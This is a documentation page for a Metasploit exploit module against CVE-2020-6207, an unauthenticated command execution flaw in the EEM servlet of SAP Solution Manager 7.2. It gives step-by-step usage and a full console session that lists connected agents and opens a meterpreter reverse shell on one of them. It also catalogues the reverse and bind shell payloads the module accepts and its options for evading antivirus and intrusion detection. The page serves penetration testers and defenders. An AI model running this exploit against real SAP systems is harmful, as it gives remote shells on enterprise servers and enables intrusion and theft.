SAP Solution Manager remote unauthorized OS commands execution - Metasploit


This page contains detailed information about how to use the exploit/multi/sap/cve_2020_6207_solman_rs metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: SAP Solution Manager remote unauthorized OS commands execution
Module: exploit/multi/sap/cve_2020_6207_solman_rs
Source code: modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb
Disclosure date: 2020-10-03
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 50000
List of CVEs: CVE-2020-6207

This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication checks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF) and execute OS command on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8. Successful exploitation will allow unauthenticated remote attackers to get reverse shell from connected to the SolMan agent as the user under which it runs SMDAgent service, usually daaadm.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use exploit/multi/sap/cve_2020_6207_solman_rs
msf exploit(cve_2020_6207_solman_rs) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication checks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF) and execute OS command on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.

Successful exploitation will allow unauthenticated remote attackers to get reverse shell from connected to the SolMan agent as the user under which it runs SMDAgent service, usually daaadm.

Paper: An Unauthenticated Journey to Root

Application Background

In SAP landscapes, SolMan could be compared to a domain controller system in the Microsoft world. It is a technical system that is highly connected with powerful privileges to all other SAP systems. Once an SAP system is connected to the solution manager, it receives the name of a "managed" or "satellite" system. As an administration solution, SolMan is intended to centralize the management of all the systems within the landscape by performing actions such as implementing, supporting, monitoring and maintaining enterprise solutions.

Installation Steps

Steps to install, configure and manage SolMan can be found online at this page.

Once set up and configured, the instances will be vulnerable at the default HTTP port 50000.

Verification Steps


  1. Start msfconsole
  2. Do: workspace [WORKSPACE]
  3. Do: use auxiliary/admin/sap/sap_2020_6207_solman_rs
  4. Do: set RHOSTS [SolMan IP]
  5. Do: set LHOST [Your IP]
  6. Do: check
  7. Verify that the target is vulnerable and the list of connected agents was returned.
  8. Do: set AGENT [Connected agent server name]
  9. Do: exploit
  10. Verify that the session from the connected agent was created.

Options


TARGETURI

This is the path to the EEM admin page of the SolMan that is vulnerable to CVE-2020-6207. By default, it is set to /EemAdminService/EemAdmin. However, it can be changed if SolMan was installed by a path different from that of the web root. For example, if the SolMan server was proxied to the /solman/ path under the web root, then this value would be set to /solman/EemAdminService/EemAdmin.

AGENT

Connected agent server name. Example: linux_agent

Scenarios


Vulnerable SolMan 7.2 running on agent: test_linux with OS: Linux and java version: 1.8

msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use exploit/multi/sap/cve_2020_6207_solman_rs
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > set RHOST 172.16.30.46
RHOST => 172.16.30.46
msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > set LHOST 192.168.50.3
LHOST => 192.168.50.3
msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > check

[+] Successfully retrieved agent list:
Connected Agents List
=====================

 Server Name   Host Name                Instance Name  OS Name                 Java Version
 -----------   ---------                -------------  -------                 ------------
 test_windows  SAP731.corp.test.com     SMDA97         Windows Server 2008 R2  1.6.0_29
 test_linux    SAPERP7.corp.test.com    SMDA98         Linux                   1.8.0_25

[+] 172.16.30.46:50000 - The target is vulnerable.
msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > set AGENT test_linux
AGENT => test_linux
msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > exploit

[*] Started reverse TCP handler on 192.168.50.3:4444
[*] Enable EEM on agent: test_linux
[*] Sending stage (3008420 bytes) to 172.16.30.14
[*] Command Stager progress - 100.00% done (809/809 bytes)
[*] Meterpreter session 1 opened (192.168.50.3:4444 -> 172.16.30.14:60203) at 2021-03-25 17:03:38 +0300

meterpreter > getuid
Server username: daaadm @ SAPERP7 (uid=1004, gid=1001, euid=1004, egid=1001)
meterpreter > pwd
/usr/sap/DAA/SMDA98/SMDAgent
meterpreter > ipconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv4 Address : 127.0.0.2
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:f4:8d:e0
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 172.16.30.14
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fef4:8de0
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > services
Services
========

host          port   proto  name  state  info
----          ----   -----  ----  -----  ----
172.16.30.46  50000  tcp    soap  open   SAP Solution Manager

msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                                            References
---------                ----          ----                                                            ----------
2021-03-25 14:03:37 UTC  172.16.30.46  SAP Solution Manager remote unauthorized OS commands execution  CVE-2020-6207,URL-https://i.blackhat.com/USA-20/Wednesday/us-20-
                                                                                                       Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-E
                                                                                                       nterprise-Software-Servers-wp.pdf,URL-https://github.com/chipik/
                                                                                                       SAP_EEM_CVE-2020-6207

msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                                       Connection
  --  ----  ----                   -----------                                                                       ----------
  1         meterpreter x64/linux  daaadm @ SAPERP7 (uid=1004, gid=1001, euid=1004, egid=1001) @ SAPERP7.corp.te...  192.168.50.3:4444 -> 172.16.30.14:60203 (::1)

Go back to menu.

Msfconsole Usage


Here is how the multi/sap/cve_2020_6207_solman_rs exploit module looks in the msfconsole:

msf6 > use exploit/multi/sap/cve_2020_6207_solman_rs

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > show info

       Name: SAP Solution Manager remote unauthorized OS commands execution
     Module: exploit/multi/sap/cve_2020_6207_solman_rs
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2020-10-03

Provided by:
  Yvan Genuer
  Pablo Artuso
  Dmitry Chastuhin
  Vladimir Ivanov

Available targets:
  Id  Name
  --  ----
  0   Linux
  1   Windows

Check supported:
  Yes

Basic options:
  Name       Current Setting            Required  Description
  ----       ---------------            --------  -----------
  AGENT      agent_server_name          yes       Agent server name for exploitation
  Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      50000                      yes       The target port (TCP)
  SRVHOST    0.0.0.0                    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080                       yes       The local port to listen on.
  SSL        false                      no        Negotiate SSL/TLS for outgoing connections
  SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /EemAdminService/EemAdmin  yes       Path to the SAP Solution Manager EemAdmin page from the web root
  URIPATH                               no        The URI to use for this exploit (default is random)
  VHOST                                 no        HTTP server virtual host

Payload information:

Description:
  This module exploits the CVE-2020-6207 vulnerability within the SAP 
  EEM servlet (tc~smd~agent~application~eem) of SAP Solution Manager 
  (SolMan) running version 7.2. The vulnerability occurs due to 
  missing authentication checks when submitting a SOAP request to the 
  /EemAdminService/EemAdmin page to get information about connected 
  SMDAgents, send HTTP request (SSRF) and execute OS command on 
  connected SMDAgent. Works stable in connected SMDAgent with Java 
  version 1.8. Successful exploitation will allow unauthenticated 
  remote attackers to get reverse shell from connected to the SolMan 
  agent as the user under which it runs SMDAgent service, usually 
  daaadm.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-6207
  https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
  https://github.com/chipik/SAP_EEM_CVE-2020-6207

Module Options


This is a complete list of options available in the multi/sap/cve_2020_6207_solman_rs exploit:

msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > show options

Module options (exploit/multi/sap/cve_2020_6207_solman_rs):

   Name       Current Setting            Required  Description
   ----       ---------------            --------  -----------
   AGENT      agent_server_name          yes       Agent server name for exploitation
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      50000                      yes       The target port (TCP)
   SRVHOST    0.0.0.0                    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080                       yes       The local port to listen on.
   SSL        false                      no        Negotiate SSL/TLS for outgoing connections
   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /EemAdminService/EemAdmin  yes       Path to the SAP Solution Manager EemAdmin page from the web root
   URIPATH                               no        The URI to use for this exploit (default is random)
   VHOST                                 no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux

Advanced Options


Here is a complete list of advanced options supported by the multi/sap/cve_2020_6207_solman_rs exploit:

msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > show advanced

Module advanced options (exploit/multi/sap/cve_2020_6207_solman_rs):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   CMDSTAGER::DECODER                                                          no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto                                                no        The CMD Stager to use. (Accepted: auto, printf, echo, bourne, certutil, vbs, debug_write, debug_asm)
   CMDSTAGER::SSL          false                                               no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                             no        Writable directory for staged files
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/sap/cve_2020_6207_solman_rs module can exploit:

msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux
   1   Windows

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/sap/cve_2020_6207_solman_rs exploit:

msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/pingback_bind_tcp                                normal  No     Linux x64 Pingback, Bind TCP Inline
   12  payload/linux/x64/pingback_reverse_tcp                             normal  No     Linux x64 Pingback, Reverse TCP Inline
   13  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   14  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   15  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   16  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   17  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   18  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   19  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   20  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   21  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   22  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   23  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   24  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   25  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   26  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   27  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   28  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   30  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   31  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   32  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   33  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   34  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   35  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   36  payload/linux/x86/read_file                                        normal  No     Linux Read File
   37  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   38  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   39  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   40  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   41  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   42  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   43  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   45  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   46  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   47  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   48  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   49  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   50  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the multi/sap/cve_2020_6207_solman_rs exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/sap/cve_2020_6207_solman_rs) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Solution Manager server: <HOST>:<PORT> is vulnerable but no agents are connected!


Here is a relevant code snippet related to the "Solution Manager server: <HOST>:<PORT> is vulnerable but no agents are connected!" error message:

122:	      agents = make_agents_array
123:	    rescue RuntimeError
124:	      return Exploit::CheckCode::Safe
125:	    end
126:	    if agents.empty?
127:	      print_status("Solution Manager server: #{@host}:#{@port} is vulnerable but no agents are connected!")
128:	    else
129:	      print_good("Successfully retrieved agent list:\n#{pretty_agents_table(agents)}")
130:	    end
131:	    report_service_and_vuln
132:	    Exploit::CheckCode::Vulnerable

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Yvan Genuer
  • Pablo Artuso
  • Dmitry Chastuhin
  • Vladimir Ivanov

Version


This page has been produced using Metasploit Framework version 6.2.4-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.